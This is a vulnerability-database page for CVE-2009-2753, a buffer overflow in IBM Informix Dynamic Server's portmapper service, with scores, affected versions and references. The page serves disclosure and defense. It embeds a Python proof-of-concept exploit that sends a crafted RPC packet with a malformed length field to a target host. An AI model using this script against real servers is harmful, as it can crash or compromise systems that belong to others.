CVE-2009-2753 Detail

CVE-2009-2753

CVE Descriptions

Multiple buffer overflows in the authentication functionality in librpc.dll in the Informix Storage Manager (ISM) Portmapper service (aka portmap.exe), as used in IBM Informix Dynamic Server (IDS) 10.x before 10.00.TC9 and 11.x before 11.10.TC3, allow remote attackers to execute arbitrary code via a crafted parameter size.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-119	Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 12109

Publication date : 2010-04-07 22h00 +00:00
Author : ZSploit.com
EDB Verified : Yes

# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability # Date: 2010-04-08 # Author: ZSploit.com # Software Link: N/A # Version: N/A # Tested on: IBM Informix Dynamic Server 10.0 # CVE : CVE-2009-2754 #! /usr/bin/env python ############################################################################### ## File : zs_ids_rpc.py ## Description: ## : ## Created_On : Mar 21 2010 ## ## (c) Copyright 2010, ZSploit.com. all rights reserved. ############################################################################### """ The issue in __lgto_svcauth_unix(): .text:1000B8E1 mov [ebp+0], eax .text:1000B8E4 mov eax, [ebx] .text:1000B8E6 push eax ; netlong .text:1000B8E7 add ebx, 4 .text:1000B8EA call esi ; ntohl ; Get length of hostname .text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check .text:1000B8F1 jle short loc_1000B8FD .text:1000B8F3 mov esi, 1 .text:1000B8F8 jmp loc_1000B9D5 .text:1000B8FD ; --------------------------------------------------------------------------- .text:1000B8FD .text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j .text:1000B8FD mov edi, [ebp+4] .text:1000B900 mov ecx, eax .text:1000B902 mov edx, ecx .text:1000B904 mov esi, ebx .text:1000B906 shr ecx, 2 .text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow .text:1000B90B mov ecx, edx .text:1000B90D add eax, 3 .text:1000B910 and ecx, 3 .text:1000B913 rep movsb """ import sys import socket if (len(sys.argv) != 2): print "Usage:\t%s [target]" % sys.argv[0] sys.exit(0) data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \ "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \ "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x00\x00\x00\x00\x00\x00\x00\x00" host = sys.argv[1] port = 36890 print "PoC for ZDI-10-023 by ZSploit.com" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) s.send(data) print "Sending payload .." except: print "Error in send" print "Done" except: print "Error in socket" The ZSploit Team http://zsploit.com

Products Mentioned

Configuraton 0

Ibm>>Informix_dynamic_server >> Version 10.0

Ibm>>Informix_dynamic_server >> Version 10.0 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 10.0.tc1

Ibm>>Informix_dynamic_server >> Version 10.0.tc1 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 10.0.xc1

Ibm>>Informix_dynamic_server >> Version 10.0.xc1 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 10.0.xc2e

Ibm>>Informix_dynamic_server >> Version 10.0.xc3

Ibm>>Informix_dynamic_server >> Version 10.0.xc3 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 10.0.xc3e

Ibm>>Informix_dynamic_server >> Version 10.0.xc4

Ibm>>Informix_dynamic_server >> Version 10.0.xc4e

Ibm>>Informix_dynamic_server >> Version 10.0.xc5

Ibm>>Informix_dynamic_server >> Version 10.0.xc5e

Ibm>>Informix_dynamic_server >> Version 10.0.xc6

Ibm>>Informix_dynamic_server >> Version 10.0.xc6e

Ibm>>Informix_dynamic_server >> Version 10.0.xc7

Ibm>>Informix_dynamic_server >> Version 10.0.xc7e

Ibm>>Informix_dynamic_server >> Version 10.0.xc8

Ibm>>Informix_dynamic_server >> Version 10.0.xc8e

Ibm>>Informix_dynamic_server >> Version 10.0.xc9

Ibm>>Informix_dynamic_server >> Version 10.0.xc9e

Ibm>>Informix_dynamic_server >> Version 10.0.xc10

Ibm>>Informix_dynamic_server >> Version 10.0.xc10e

Ibm>>Informix_dynamic_server >> Version 11.1

Ibm>>Informix_dynamic_server >> Version 11.10

Ibm>>Informix_dynamic_server >> Version 11.10 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 11.10.xc1

Ibm>>Informix_dynamic_server >> Version 11.10.xc1 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 11.10.xc1de

Ibm>>Informix_dynamic_server >> Version 11.10.xc2

Ibm>>Informix_dynamic_server >> Version 11.10.xc2 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 11.10.xc2e

Ibm>>Informix_dynamic_server >> Version 11.10.xc3

Ibm>>Informix_dynamic_server >> Version 11.10.xc3 (Open CPE detail)

Ibm>>Informix_dynamic_server >> Version 11.10.xc3e

References

http://secunia.com/advisories/38731
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.vupen.com/english/advisories/2010/0508
Tags : vdb-entry, x_refsource_VUPEN

http://www.ibm.com/support/docview.wss?uid=swg1IC55329
Tags : vendor-advisory, x_refsource_AIXAPAR

http://www.ibm.com/support/docview.wss?uid=swg1IC55330
Tags : vendor-advisory, x_refsource_AIXAPAR

http://www.zerodayinitiative.com/advisories/ZDI-10-022
Tags : x_refsource_MISC

http://securitytracker.com/id?1023669
Tags : vdb-entry, x_refsource_SECTRACK

http://www.securityfocus.com/archive/1/509789/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://www.securityfocus.com/bid/38471
Tags : vdb-entry, x_refsource_BID

CVE-2009-2753 : Detail